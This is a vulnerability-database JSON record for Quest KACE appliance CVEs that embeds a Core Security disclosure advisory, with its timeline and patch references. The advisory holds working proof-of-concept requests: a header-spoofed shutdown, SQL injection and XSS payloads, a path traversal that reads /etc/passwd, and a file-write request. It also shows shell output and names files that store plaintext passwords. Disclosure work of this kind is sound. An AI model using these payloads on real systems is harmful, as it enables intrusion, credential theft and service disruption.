8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. 
\n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the \u0027kace_support\u0027 account, which\ncomes disabled by default but has full sudo privileges. \n\n7.5. *Privilege escalation via command injection in Sudo Server*\n\n[CVE-2018-11132]\nAs mentioned in the issue [7.4], in order to perform actions that require\nhigher privileges, the application relies on a message queue that runs\ndaemonized with root privileges and only allows a set of commands to be\nexecuted. \n\n7.6. *Insufficient Authorization for critical function*\n\n[CVE-2018-11142]\n\u0027systemui/settings_network.php\u0027 and \u0027systemui/settings_patching.php\u0027\nscripts are accessible only from localhost. This restriction can be bypassed\nby modifying the \u0027Host\u0027 and \u0027X_Forwarded_For\u0027 HTTP headers. 
\n\nThe following proof of concept abuses this vulnerability to shutdown the\nserver as an anonymous user:\n\n/-----\nPOST /systemui/settings_network.php HTTP/1.1\nHost: localhost\nX-Forwarded-For: ::1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIp]/systemui/settings_network.php\nContent-Type: multipart/form-data;\nboundary=---------------------------5642543667001619951434940129\nContent-Length: 3418\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n-----------------------------5642543667001619951434940129\nContent-Disposition: form-data; name=\"$shutdown\"\nDoIt!\nContent-Disposition: form-data; name=\"save\"\nSave\n-----------------------------5642543667001619951434940129--\n-----/\n\n7.7. *Unauthenticated SQL Injection in download_agent_installer.php*\n\n[CVE-2018-11136]\nThe \u0027orgID\u0027 parameter received by the \u0027/common/download_agent_installer.php\u0027\nscript is not sanitized, leading to SQL injection. In particular, a blind\ntime based type. \n\nThe following proof of concept induces a time delay:\n\n/-----\nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1\nAND SLEEP(10)%23;\u0026version=8.0.152\n-----/\n\n7.8. *SQL Injection in run_report.php*\n\n[CVE-2018-11140]\nThe \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script\nis not sanitized, leading to SQL injection. In particular, an error based\ntype. 
\n\nThe following proof of concept retrieves the current database name:\n\n/-----\nPOST /common/run_report.php HTTP/1.1\nContent-Length: 161\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nHost: [ServerIP]\nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8\nConnection: close\nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID=\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nCookie: [Cookie]\n\ndate=1516135247598\u0026reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx\u0026reportName=\u0026format=pdf\n-----/\n\n/-----\nHTTP/1.1 200 OK\nDate: Thu, 08 Feb 2018 21:50:21 GMT\nServer: Apache\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0,\npre-check=0\nPragma: no-cache\nVary: Accept-Encoding\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: [ServerIP]\nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: [ServerIP]\nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: [ServerIP]\nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nContent-Length: 3548\nConnection: close\nContent-Type: text/html; charset=utf-8\n\n[...SNIPPED...]\n\u003cscript type=\"text/javascript\"\nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /\u003e\u003c/script\u003e\n\u003c![endif]--\u003e\u003ctitle\u003eReport Queued: qppjqORG1qjpqq\u003c/title\u003e\u003cmeta\nhttp-equiv=\u0027refresh\u0027\n[...SNIPPED...]\n-----/\n\n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php*\n\n[CVE-2018-11133]\nThe \u0027fmt\u0027 parameter of the \u0027/common/run_cross_report.php\u0027 script is\nvulnerable to cross-site scripting. 
\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\n7.10. *Path traversal in download_attachment.php leading to arbitrary\nfile read*\n\n[CVE-2018-11137]\nThe \u0027checksum\u0027 parameter of the \u0027/common/download_attachment.php\u0027 script can\nbe abused to read arbitrary files with \u0027www\u0027 privileges. The following proof\nof concept reads the \u0027/etc/passwd\u0027 file. No administrator privileges are\nneeded to execute this script. \n\nIt is worth noting that there are several interesting files that can be\nread with \u0027www\u0027 privileges, such as all the files located in\n\u0027/kbox/bin/koneas/keys/\u0027 and \u0027/kbox/kboxwww/include/globals.inc\u0027,\nwhich contain plaintext passwords. \n\n/-----\nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952\n-----/\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd\u0026filename=\nHTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\nHTTP/1.1 200 OK\nDate: Thu, 18 Jan 2018 17:18:19 GMT\nServer: Apache\nCache-Control: must-revalidate, post-check=0, pre-check=0\nExpires: -1\nPragma: public\nContent-Disposition: attachment; filename=\"\"\nContent-Transfer-Encoding: Binary\nContent-Description: K1000 attachment\nContent-Length: 2400\nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key,\nx-kace-auth-signature, accept, origin, content-type\nAccess-Control-Allow-Origin: *\nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, 
OPTIONS\nX-KACE-Appliance: K1000\nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318\nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318\nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE\nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform\nConnection: close\nContent-Type: application/octet-stream\n\n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $\n#\nroot:*:0:0:Charlie \u0026:/root:/bin/csh\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System \u0026:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...]\n-----/\n\n7.11. *Path traversal in advisory.php leading to arbitrary file\ncreation/deletion*\n\n[CVE-2018-11141]\nThe \u0027IMAGES_JSON\u0027 and \u0027attachments_to_remove[]\u0027 parameters of the\n\u0027/adminui/advisory.php\u0027 script can be abused to write and delete files\nrespectively. The following proof of concept creates a file located at\n\u0027/kbox/kboxwww/resources/TestWrite\u0027 with the content \u0027Sarasa\u0027 (base64\nencoded). \nFiles can be at any location where the \u0027www\u0027 user has write permissions. \n\nFile deletion could be abused to delete\n\u0027/kbox/kboxwww/systemui/reports/setup_completed.log\u0027 file. This file\u0027s\nexistence defines if the appliance setup wizard is shown or not. 
\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nPOST /adminui/advisory.php?ID=10 HTTP/1.1\nHost: [ServerIP]\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://[ServerIP]/adminui/advisory.php?ID=10\nContent-Type: multipart/form-data;\nboundary=---------------------------2671551246366368501556269100\nContent-Length: 1705\nCookie: [Cookie]\nConnection: close\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\n\n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"IMAGES_JSON\"\n\n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"}\n-----------------------------2671551246366368501556269100\nContent-Disposition: form-data; name=\"FARRAY[ID]\"\n[...SNIPPED...]\n-----/\n\nTaking advantage of 7.2 and 7.4 we are able to verify the file creation:\n\n/-----\n[root@k10000 /kbox/kboxwww/resources]# ls -lha\ntotal 32\ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite\n-----/\n\n8. *Report Timeline*\n2018-02-26: Core Security (Core) sent an initial notification to Quest\nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional\ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical\ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required\nonce the vendor verifies the vulnerabilities. Additionally, Core Security\nrequested a confirmation about the reported vulnerabilities and a tentative\ntimescale to fix them. 
Finally, Core Security requested that Quest use\nCore\u0027s advisories-publication email address as the official communication\nchannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core\u0027s reply and stated it will be in\ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any\nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version\nused for reporting the issues and also Core\u0027s company name and information. \n2018-03-21: Core replied with the affected version (that was included in\nthe original draft advisory) and a link to the Core company website and\nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest\u0027s KACE product manager (PM) thanked Core for making it\naware of the security issues found and the level of thoroughness and details\nprovided. Quest specified it had fixes already in place for some of the\nissues. Quest\u0027s KACE PM asked for a conference call in order to understand\nmore about Core\u0027s offerings for future engagements. Finally, Quest\u0027s KACE\nPM notified the work done by Core is in breach of its license agreement,\nand requested Core not to distribute the findings to the public, otherwise\nQuest would take legal action. \n2018-04-13: Quest\u0027s KACE PM sent a follow up email and informed that it\nmade a hotfix to patch the reported vulnerabilities. Quest also requested\na call meeting to understand future opportunities based on the Core\u0027s\ncompany capabilities. Finally, Quest asked for information about the\nresearcher that found the vulnerabilities and a link of Core\u0027s choosing\nin order to be included in Quest\u0027s Acknowledgment page\n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 
\n2018-04-16: Core answered email from 2018-03-26 stating the company is\nfollowing standard practices with regards to coordinated vulnerability\ndisclosure, and also sent detailed technical information about our findings\nat Quest\u0027s request. Core also mentioned Quest seems to be well versed in\nthe disclosure process and expects vendors to coordinate with it prior to\npublication via Quest\u0027s vulnerability reporting process, and that Quest\u0027s\nlegal threat appears to be in direct contradiction to the disclosure\nprocess that they encourage on their website. Finally, Core asked about\nQuest\u0027s intention to work collaboratively to address these vulnerabilities\nand to follow industry standard disclosure processes that involves\npublication of the vulnerabilities. \n2018-04-17: Quest\u0027s KACE PM replied saying it is willing to collaborate\nand is looking forward to having a conversation over the phone in order to\ncontinue the next steps in its vulnerability process (forwarded email from\n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping\nwritten communications between parties in order to better document the\nprocess and communicated the next steps of the process including: 1. Testing\nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor\u0027s link to be\nincluded in the advisory and finally 4. Send final advisory version to\nvendor and coordinate publication date together. With regards to Quest\u0027s\nrequests, Core provided the researchers names and URL of the advisory when\nit will be published. Finally, Core stated that the request for other Core\ncompany services could be forwarded to the Core services team if needed\n(and asked the right contact at Quest) but our intention is to keep that\nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available\npatches for its customers and unilaterally closed the case. 
\n2018-05-31: Advisory CORE-2018-0004 published. \n\n9. *References*\n\n[1] https://www.quest.com/products/kace-systems-management-appliance/\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security, is charged with anticipating\nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber-attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at:\nhttp://corelabs.coresecurity.com. \n\n11. *About Core Security*\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The company\u0027s\nthreat-aware, identity \u0026 access, network security, and vulnerability\nmanagement solutions provide actionable insight and context needed to\nmanage security risks across the enterprise. This shared insight gives\ncustomers a comprehensive view of their security posture to make better\nsecurity remediation decisions. Better insight allows organizations to\nprioritize their efforts to protect critical assets, take action sooner\nto mitigate access risk, and react faster if a breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2018 Core Security and (c)\n2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. 
*PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nadvisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44950",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-11138"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-11138",
"trust": 3.2
},
{
"db": "EXPLOIT-DB",
"id": "44950",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-10907",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-11138",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "148005",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"id": "VAR-201805-0598",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
}
],
"trust": 1.1800866
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
}
]
},
"last_update_date": "2023-12-18T12:01:57.517000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "KACE Systems Management Appliance",
"trust": 0.8,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"title": "Patch for QuestKACESystemManagementAppliance Command Injection Vulnerability (CNVD-2018-10907)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/131203"
},
{
"title": "Quest KACE System Management Appliance Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=81228"
},
{
"title": "lean0x2f.github.io",
"trust": 0.1,
"url": "https://github.com/lean0x2f/lean0x2f.github.io "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "NVD",
"id": "CVE-2018-11138"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://www.exploit-db.com/exploits/44950/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11138"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-11138"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/exploit/unix/http/quest_kace_systems_management_rce"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11139"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11134"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/download_agent_installer.php?platform=windows\u0026serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f\u0026orgid=1"
},
{
"trust": 0.1,
"url": "http://[serverip]/systemui/settings_network.php"
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/reporting-security-vulnerability."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/advisory.php?id=10"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11136"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11140"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11132"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11133"
},
{
"trust": 0.1,
"url": "https://www.quest.com/products/kace-systems-management-appliance/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://support.quest.com/essentials/vulnerability-reporting-acknowledgements)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11141"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11142"
},
{
"trust": 0.1,
"url": "https://support.quest.com/download-install-detail/6086148."
},
{
"trust": 0.1,
"url": "http://[serverip]/adminui/analysis_report_list.php?category_id="
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-11137"
},
{
"trust": 0.1,
"url": "http://[serverip]/common/run_cross_report.php?uniqueid=366314513\u0026id=585\u0026org=1\u0026fmt=xls34403\u0027)%3balert(1)%2f%2f952"
},
{
"trust": 0.1,
"url": "https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"date": "2018-05-31T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"date": "2018-05-31T20:52:06",
"db": "PACKETSTORM",
"id": "148005"
},
{
"date": "2018-05-31T18:29:00.557000",
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"date": "2018-06-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-06-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-10907"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-11138"
},
{
"date": "2018-07-17T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-005411"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-11138"
},
{
"date": "2019-10-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Quest KACE Systems Management Appliance Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-005411"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201805-1216"
}
],
"trust": 0.6
}
}
VAR-201805-0595
Vulnerability from variot - Updated: 2023-12-18 12:01 The script '/adminui/error_details.php' in the Quest KACE System Management Appliance 8.0.318 allows authenticated users to conduct PHP object injection attacks. Quest KACE Systems Management Appliance contains a code injection vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). Quest KACE System Management Appliance is an IT asset management device from Quest Software, USA. The ‘/adminui/error_details.php’ script in Quest KACE System Management Appliance 8.0.318 has a PHP object injection vulnerability. An attacker can exploit this vulnerability to inject a PHP object and execute arbitrary commands. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Quest KACE System Management Appliance Multiple Vulnerabilities
- Advisory Information
Title: Quest KACE System Management Appliance Multiple Vulnerabilities Advisory ID: CORE-2018-0004 Advisory URL: http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities Date published: 2018-05-31 Date of last update: 2018-05-22 Vendors contacted: Quest Software Inc. Release mode: Forced release
- Vulnerability Information
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Authorization [CWE-285], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Special Elements used in an SQL Command [CWE-89], Improper Neutralization of Input During Web Page Generation [CWE-79], External Control of File Name or Path [CWE-73], External Control of File Name or Path [CWE-73] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134, CVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140, CVE-2018-11133, CVE-2018-11137, CVE-2018-11141
- Vulnerability Description
From Quest KACE's website:
"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement."
Multiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.
Additional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.
Note: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of "responsible disclosure" can be found at https://support.quest.com/essentials/reporting-security-vulnerability.
CoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.
We regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of any possibility of agreeing on a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.
- Vulnerable Packages
- Quest KACE System Management Appliance 8.0 (Build 8.0.318). Other products and versions might be affected too, but they were not tested.
- Vendor Information, Solutions and Workarounds
Quest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. The patch can be downloaded at https://support.quest.com/download-install-detail/6086148.
For more details, Quest published the following Security Note: https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-
- Credits
These vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Technical Description / Proof of Concept Code
Quest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.
Section 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.
Vulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.
In addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.
